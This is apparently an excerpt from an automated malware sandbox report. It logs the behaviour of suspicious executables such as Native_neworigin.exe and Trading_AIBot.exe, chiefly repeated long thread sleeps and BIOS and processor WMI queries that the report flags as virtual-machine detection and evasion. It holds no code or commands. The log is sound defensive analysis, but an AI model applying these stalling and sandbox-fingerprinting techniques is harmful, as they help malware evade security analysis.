Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99872s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99714s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99589s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99449s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98887s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98664s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98534s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98299s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98156s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97796s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97527s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97274s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97150s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -96968s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -96825s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -96570s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -96299s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95822s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95662s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95499s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95388s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95189s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5080 Thread sleep count: 419 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94910s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94785s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94641s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94529s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94371s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94242s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94117s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -93939s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -93715s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 6116 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7344 Thread sleep time: -720000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6104 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 760 Thread sleep count: 4599 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4772 Thread sleep time: -220000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6040 Thread sleep count: 284 > 30
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 2932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6976 Thread sleep time: -70000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99655s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99543s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98761s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98639s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98200s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96751s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96513s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96249s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96134s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95810s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95374s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94701s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94374s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 2228 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8092 Thread sleep time: -562620000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8092 Thread sleep time: -24600000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\xpha.pif Last function: Thread delayed
Source: C:\Windows\System32\alg.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02CF5908
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_00EF0207
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_00EF589A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose, 7_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 7_2_00EE532E
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 15_2_00EF589A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 15_2_00EF0207
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 15_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose, 15_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 15_2_00EE532E
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99872 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99714 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99589 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99449 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99172 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98887 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98664 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98534 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98299 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98156 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97796 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97527 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97274 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97150 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96968 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96825 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96570 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96299 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95822 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95662 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95499 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95388 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95189 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95047 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94910 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94785 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94641 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94529 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94371 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94242 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94117 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 93939 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 93715 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\alg.exe Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99890
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99655
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99543
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99218
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99109
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98999
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98761
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98639
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98527
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98421
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98312
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98200
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98093
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97984
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97874
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97765
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97656
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97546
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97437
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97328
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97218
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97109
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97000
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96890
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96751
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96625
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96513
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96375
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96249
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96134
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96031
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95916
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95810
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95703
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95593
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95484
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95374
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95265
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95156
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95046
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94937
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94828
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94701
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94593
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94484
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94374
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Thread delayed: delay time: 60000
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: xpha.pif, 00000010.00000002.1566080519.0000000002D5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
